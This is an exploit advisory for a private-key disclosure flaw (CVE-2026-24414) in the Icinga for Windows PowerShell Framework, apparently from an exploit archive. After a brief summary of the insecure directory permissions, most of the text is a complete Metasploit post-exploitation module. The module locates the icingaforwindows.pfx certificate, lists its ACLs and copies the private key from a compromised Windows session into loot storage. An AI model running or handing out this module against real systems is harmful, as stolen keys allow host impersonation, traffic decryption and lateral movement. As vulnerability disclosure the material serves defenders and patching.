============================================================================================================================================= | # Title : Icinga for Windows 1.13.3 PowerShell Framework – Insecure Default Certificate Permissions Leads to Private Key Disclosure | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://github.com/Icinga/icinga-powershell-framework/releases/tag/v1.13.3 | ============================================================================================================================================= [+] Summary : This module identifies and exploits insecure default ACL permissions in vulnerable versions of the Icinga for Windows PowerShell Framework. The certificate directory is created with overly permissive read access for the BUILTIN\Users group, allowing any local user to access the icingaforwindows.pfx file containing the private key. Successful exploitation enables retrieval of the PKCS#12 certificate file from a non-administrative session, confirming improper permission configuration. Exposure of the private key may allow host impersonation, decryption of monitoring traffic, and potential lateral movement within enterprise environments. The module performs: Certificate file existence validation Privilege context detection Optional ACL enumeration for documentation Secure loot storage of the exposed private key This issue affects versions prior to 1.13.4, 1.12.4, and 1.11.2 [+] POC : ## # This module requires Metasploit Framework ## class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Accounts def initialize(info = {}) super( update_info( info, 'Name' => 'Icinga for Windows PowerShell Framework Private Key Disclosure', 'Description' => %q{ This module checks and exploits insecure default permissions on the Icinga for Windows certificate directory which allows local users to read the private key (.pfx file). }, 'License' => MSF_LICENSE, 'Author' => ['indoushka'], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'References' => [['CVE', '2026-24414']], 'DisclosureDate' => '2026-02-23' ) ) end def certificate_path 'C:\\Program Files\\WindowsPowerShell\\Modules\\icinga-powershell-framework\\certificate\\icingaforwindows.pfx' end def check unless session.platform =~ /win/i return Exploit::CheckCode::Unsupported end begin if file?(certificate_path) return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end rescue return Exploit::CheckCode::Unknown end end def run unless session.platform =~ /win/i fail_with(Failure::NoTarget, 'Windows session required.') end print_status("Running as: #{get_current_user}") print_status("Admin privileges: #{is_admin?}") unless file?(certificate_path) fail_with(Failure::NotFound, 'Certificate file not found.') end print_good("Target certificate found:") print_status(certificate_path) begin acl = cmd_exec("icacls \"#{File.dirname(certificate_path)}\"") print_status("ACL Information:\n#{acl}") rescue print_warning("Could not retrieve ACL information.") end begin data = read_file(certificate_path) if data.nil? || data.empty? fail_with(Failure::UnexpectedReply, 'File read returned empty content.') end loot_path = store_loot( 'icinga.private_key', 'application/x-pkcs12', session, data, "icingaforwindows_#{Time.now.to_i}.pfx", 'Exposed Icinga Private Key' ) print_good("Private key successfully retrieved!") print_good("Stored at: #{loot_path}") unless is_admin? print_warning("VULNERABILITY CONFIRMED: Non-admin session accessed private key.") end rescue Rex::Post::Meterpreter::RequestError => e fail_with(Failure::PermissionDenied, "Read failed: #{e.message}") end end def get_current_user begin client.sys.config.getuid rescue 'Unknown' end end end Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================